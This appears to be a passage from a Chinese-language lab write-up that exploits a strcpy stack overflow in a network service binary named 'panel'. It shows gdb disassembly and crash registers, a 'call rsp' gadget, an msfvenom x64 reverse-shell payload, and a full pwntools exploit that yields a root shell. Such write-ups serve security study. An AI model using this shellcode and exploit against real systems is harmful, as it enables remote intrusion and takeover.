188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
root@kali:~# gdb panel
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from panel...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000000004009ab <+0>: push rbp
0x00000000004009ac <+1>: mov rbp,rsp
0x00000000004009af <+4>: sub rsp,0x1050
0x00000000004009b6 <+11>: call 0x400820 <fork@plt>
0x00000000004009bb <+16>: mov DWORD PTR [rbp-0x4],eax
0x00000000004009be <+19>: cmp DWORD PTR [rbp-0x4],0x0
0x00000000004009c2 <+23>: jne 0x400b75 <main+458>
0x00000000004009c8 <+29>: mov DWORD PTR [rbp-0x8],0x1
0x00000000004009cf <+36>: mov DWORD PTR [rbp-0x14],0x1
0x00000000004009d6 <+43>: mov edx,0x0
0x00000000004009db <+48>: mov esi,0x1
0x00000000004009e0 <+53>: mov edi,0x2
0x00000000004009e5 <+58>: call 0x400830 <socket@plt>
0x00000000004009ea <+63>: mov DWORD PTR [rbp-0xc],eax
0x00000000004009ed <+66>: cmp DWORD PTR [rbp-0xc],0xffffffff
0x00000000004009f1 <+70>: jne 0x4009ff <main+84>
0x00000000004009f3 <+72>: lea rdi,[rip+0x226] # 0x400c20
0x00000000004009fa <+79>: call 0x400936 <fatal>
0x00000000004009ff <+84>: lea rdx,[rbp-0x14]
0x0000000000400a03 <+88>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a06 <+91>: mov r8d,0x4
0x0000000000400a0c <+97>: mov rcx,rdx
0x0000000000400a0f <+100>: mov edx,0x2
0x0000000000400a14 <+105>: mov esi,0x1
0x0000000000400a19 <+110>: mov edi,eax
0x0000000000400a1b <+112>: call 0x400760 <setsockopt@plt>
0x0000000000400a20 <+117>: cmp eax,0xffffffff
0x0000000000400a23 <+120>: jne 0x400a31 <main+134>
0x0000000000400a25 <+122>: lea rdi,[rip+0x207] # 0x400c33
0x0000000000400a2c <+129>: call 0x400936 <fatal>
0x0000000000400a31 <+134>: mov WORD PTR [rbp-0x30],0x2
0x0000000000400a37 <+140>: mov edi,0x7a69
0x0000000000400a3c <+145>: call 0x400780 <htons@plt>
0x0000000000400a41 <+150>: mov WORD PTR [rbp-0x2e],ax
0x0000000000400a45 <+154>: mov DWORD PTR [rbp-0x2c],0x0
0x0000000000400a4c <+161>: lea rax,[rbp-0x30]
0x0000000000400a50 <+165>: add rax,0x8
0x0000000000400a54 <+169>: mov edx,0x8
0x0000000000400a59 <+174>: mov esi,0x0
0x0000000000400a5e <+179>: mov rdi,rax
0x0000000000400a61 <+182>: call 0x4007b0 <memset@plt>
0x0000000000400a66 <+187>: lea rcx,[rbp-0x30]
0x0000000000400a6a <+191>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a6d <+194>: mov edx,0x10
0x0000000000400a72 <+199>: mov rsi,rcx
0x0000000000400a75 <+202>: mov edi,eax
0x0000000000400a77 <+204>: call 0x4007e0 <bind@plt>
0x0000000000400a7c <+209>: cmp eax,0xffffffff
0x0000000000400a7f <+212>: jne 0x400a8d <main+226>
0x0000000000400a81 <+214>: lea rdi,[rip+0x1c0] # 0x400c48
0x0000000000400a88 <+221>: call 0x400936 <fatal>
0x0000000000400a8d <+226>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400a90 <+229>: mov esi,0x5
0x0000000000400a95 <+234>: mov edi,eax
0x0000000000400a97 <+236>: call 0x4007d0 <listen@plt>
0x0000000000400a9c <+241>: cmp eax,0xffffffff
0x0000000000400a9f <+244>: jne 0x400aad <main+258>
0x0000000000400aa1 <+246>: lea rdi,[rip+0x1b2] # 0x400c5a
0x0000000000400aa8 <+253>: call 0x400936 <fatal>
0x0000000000400aad <+258>: mov DWORD PTR [rbp-0x44],0x10
0x0000000000400ab4 <+265>: lea rdx,[rbp-0x44]
0x0000000000400ab8 <+269>: lea rcx,[rbp-0x40]
0x0000000000400abc <+273>: mov eax,DWORD PTR [rbp-0xc]
0x0000000000400abf <+276>: mov rsi,rcx
0x0000000000400ac2 <+279>: mov edi,eax
0x0000000000400ac4 <+281>: call 0x4007f0 <accept@plt>
0x0000000000400ac9 <+286>: mov DWORD PTR [rbp-0x10],eax
0x0000000000400acc <+289>: cmp DWORD PTR [rbp-0x10],0xffffffff
0x0000000000400ad0 <+293>: jne 0x400ade <main+307>
0x0000000000400ad2 <+295>: lea rdi,[rip+0x18b] # 0x400c64
0x0000000000400ad9 <+302>: call 0x400936 <fatal>
0x0000000000400ade <+307>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400ae1 <+310>: mov ecx,0x0
0x0000000000400ae6 <+315>: mov edx,0x1f
0x0000000000400aeb <+320>: lea rsi,[rip+0x186] # 0x400c78
0x0000000000400af2 <+327>: mov edi,eax
0x0000000000400af4 <+329>: call 0x400790 <send@plt>
0x0000000000400af9 <+334>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400afc <+337>: mov ecx,0x0
0x0000000000400b01 <+342>: mov edx,0x21
0x0000000000400b06 <+347>: lea rsi,[rip+0x18b] # 0x400c98
0x0000000000400b0d <+354>: mov edi,eax
0x0000000000400b0f <+356>: call 0x400790 <send@plt>
0x0000000000400b14 <+361>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b17 <+364>: mov ecx,0x0
0x0000000000400b1c <+369>: mov edx,0x19
0x0000000000400b21 <+374>: lea rsi,[rip+0x191] # 0x400cb9
0x0000000000400b28 <+381>: mov edi,eax
0x0000000000400b2a <+383>: call 0x400790 <send@plt>
0x0000000000400b2f <+388>: lea rsi,[rbp-0x1050]
0x0000000000400b36 <+395>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b39 <+398>: mov ecx,0x0
0x0000000000400b3e <+403>: mov edx,0x1000
0x0000000000400b43 <+408>: mov edi,eax
0x0000000000400b45 <+410>: call 0x400740 <recv@plt>
0x0000000000400b4a <+415>: mov DWORD PTR [rbp-0x8],eax
0x0000000000400b4d <+418>: mov edx,DWORD PTR [rbp-0x10]
0x0000000000400b50 <+421>: lea rax,[rbp-0x1050]
0x0000000000400b57 <+428>: mov esi,edx
0x0000000000400b59 <+430>: mov rdi,rax
0x0000000000400b5c <+433>: call 0x400964 <handlecmd>
0x0000000000400b61 <+438>: mov eax,DWORD PTR [rbp-0x10]
0x0000000000400b64 <+441>: mov edi,eax
0x0000000000400b66 <+443>: call 0x4007c0 <close@plt>
0x0000000000400b6b <+448>: mov edi,0x0
0x0000000000400b70 <+453>: call 0x400800 <exit@plt>
0x0000000000400b75 <+458>: mov edi,0x0
0x0000000000400b7a <+463>: call 0x400810 <wait@plt>
0x0000000000400b7f <+468>: jmp 0x4009b6 <main+11>
End of assembler dump.
gdb-peda$ disassemble handlecmd
Dump of assembler code for function handlecmd:
0x0000000000400964 <+0>: push rbp
0x0000000000400965 <+1>: mov rbp,rsp
0x0000000000400968 <+4>: add rsp,0xffffffffffffff80
0x000000000040096c <+8>: mov QWORD PTR [rbp-0x78],rdi
0x0000000000400970 <+12>: mov DWORD PTR [rbp-0x7c],esi
0x0000000000400973 <+15>: mov rdx,QWORD PTR [rbp-0x78]
0x0000000000400977 <+19>: lea rax,[rbp-0x70]
0x000000000040097b <+23>: mov rsi,rdx
0x000000000040097e <+26>: mov rdi,rax
0x0000000000400981 <+29>: call 0x400750 <strcpy@plt>
0x0000000000400986 <+34>: lea rax,[rbp-0x70]
0x000000000040098a <+38>: mov rdi,rax
0x000000000040098d <+41>: call 0x400770 <strlen@plt>
0x0000000000400992 <+46>: mov rdx,rax
0x0000000000400995 <+49>: lea rsi,[rbp-0x70]
0x0000000000400999 <+53>: mov eax,DWORD PTR [rbp-0x7c]
0x000000000040099c <+56>: mov ecx,0x0
0x00000000004009a1 <+61>: mov edi,eax
0x00000000004009a3 <+63>: call 0x400790 <send@plt>
0x00000000004009a8 <+68>: nop
0x00000000004009a9 <+69>: leave
0x00000000004009aa <+70>: ret
End of assembler dump.
gdb-peda$ b *0x00000000004009aa
Breakpoint 1 at 0x4009aa
gdb-peda$ r
Starting program: /root/panel
[Attaching after process 29010 fork to child process 29014]
[New inferior 2 (process 29014)]
[Detaching after fork from parent process 29010]
[Inferior 1 (process 29010) detached]
[Switching to process 29014]

[----------------------------------registers-----------------------------------]
RAX: 0xc9
RBX: 0x0
RCX: 0x7ffff7ee285d (<__libc_send+29>: cmp rax,0xfffffffffffff000)
RDX: 0xc9
RSI: 0x7fffffffd410 ('a' <repeats 200 times>...)
RDI: 0x4
RBP: 0x6161616161616161 ('aaaaaaaa')
RSP: 0x7fffffffd488 ('a' <repeats 80 times>, "\n")
RIP: 0x4009aa (<handlecmd+70>: ret)
R8 : 0x0
R9 : 0x0
R10: 0x0
R11: 0x246
R12: 0x400840 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe5c0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x4009a3 <handlecmd+63>: call 0x400790 <send@plt>
0x4009a8 <handlecmd+68>: nop
0x4009a9 <handlecmd+69>: leave
=> 0x4009aa <handlecmd+70>: ret
0x4009ab <main>: push rbp
0x4009ac <main+1>: mov rbp,rsp
0x4009af <main+4>: sub rsp,0x1050
0x4009b6 <main+11>: call 0x400820 <fork@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd488 ('a' <repeats 80 times>, "\n")
0008| 0x7fffffffd490 ('a' <repeats 72 times>, "\n")
0016| 0x7fffffffd498 ('a' <repeats 64 times>, "\n")
0024| 0x7fffffffd4a0 ('a' <repeats 56 times>, "\n")
0032| 0x7fffffffd4a8 ('a' <repeats 48 times>, "\n")
0040| 0x7fffffffd4b0 ('a' <repeats 40 times>, "\n")
0048| 0x7fffffffd4b8 ('a' <repeats 32 times>, "\n")
0056| 0x7fffffffd4c0 ('a' <repeats 24 times>, "\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 2.1 "panel" hit Breakpoint 1, 0x00000000004009aa in handlecmd ()

可以看到确实产生了溢出漏洞,200个a中,前面120个a之后就开始覆盖RSP了,那么我可以找有call rsp或者jmp rsp的指令,让他跳到我布局好的shellcode上

1
2
3
4
5
6
7
8
gdb-peda$ jmpcall
0x400728 : call rax
0x400895 : jmp rax
0x4008e3 : jmp rax
0x40092e : call rax
0x400cfb : call rsp
0x400d6b : call [rax]

0x400cfb : call rsp 就用这个了,下面就是用msfvenom生成shellcode了,注意程序使用strcpy来触发溢出,所以shellcode里不能含有null字符,不然会截断

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~# msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.227.165 LPORT=12345 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=17, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
Final size of python file: 586 bytes
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x6c\x40\xab\x94\x77\xcc\xad"
buf += "\x11\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x06\x69\xf3\x0d\x1d\xce\xf2\x7b\x6d\x1e\xa4\x91\x3f"
buf += "\x5b\xe5\xa8\x6e\x40\x9b\xad\xb7\x64\x4e\xb4\x3d\x08"
buf += "\x22\x72\x1d\xdc\xf7\x7b\x46\x18\xa4\x91\x1d\xcf\xf3"
buf += "\x59\x93\x8e\xc1\xb5\x2f\xc3\xa8\x64\x9a\x2a\x90\xcc"
buf += "\xee\x84\x16\x3e\x0e\x29\xc5\xbb\x04\xa4\xad\x42\x24"
buf += "\xc9\x4c\xc6\x20\x84\x24\xf7\x63\x45\xab\x94\x77\xcc"
buf += "\xad\x11"

那么最后的exploit就是下面这样的了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *

buf = "\x90"
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xe9\xcc\x90\x7d\x82\x16\xb2"
buf += "\x98\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x83\xe5\xc8\xe4\xe8\x14\xed\xf2\xe8\x92\x9f\x78\xca"
buf += "\x81\xfa\x21\xeb\xcc\xa0\x44\x42\xbe\x51\x3d\xb8\x84"
buf += "\x19\x9b\xe8\x06\xe8\xf2\xc3\x94\x9f\x78\xe8\x15\xec"
buf += "\xd0\x16\x02\xfa\x5c\xda\x19\xb7\xed\x1f\xa6\xab\x25"
buf += "\x1b\x5e\x09\xb7\x8b\xa5\xfe\x52\xf1\x7e\xb2\xcb\xa1"
buf += "\x45\x77\x2f\xd5\x5e\x3b\x7e\xe6\xc9\x90\x7d\x82\x16"
buf += "\xb2\x98"

buf += p32(0x400cfb)

#print buf

r = remote("192.168.227.191", 31337)
r.recvuntil("=>")
r.sendline(buf)

先在本机监听12345端口,然后再运行这个exploit,成功收到root发来的reverse shell

8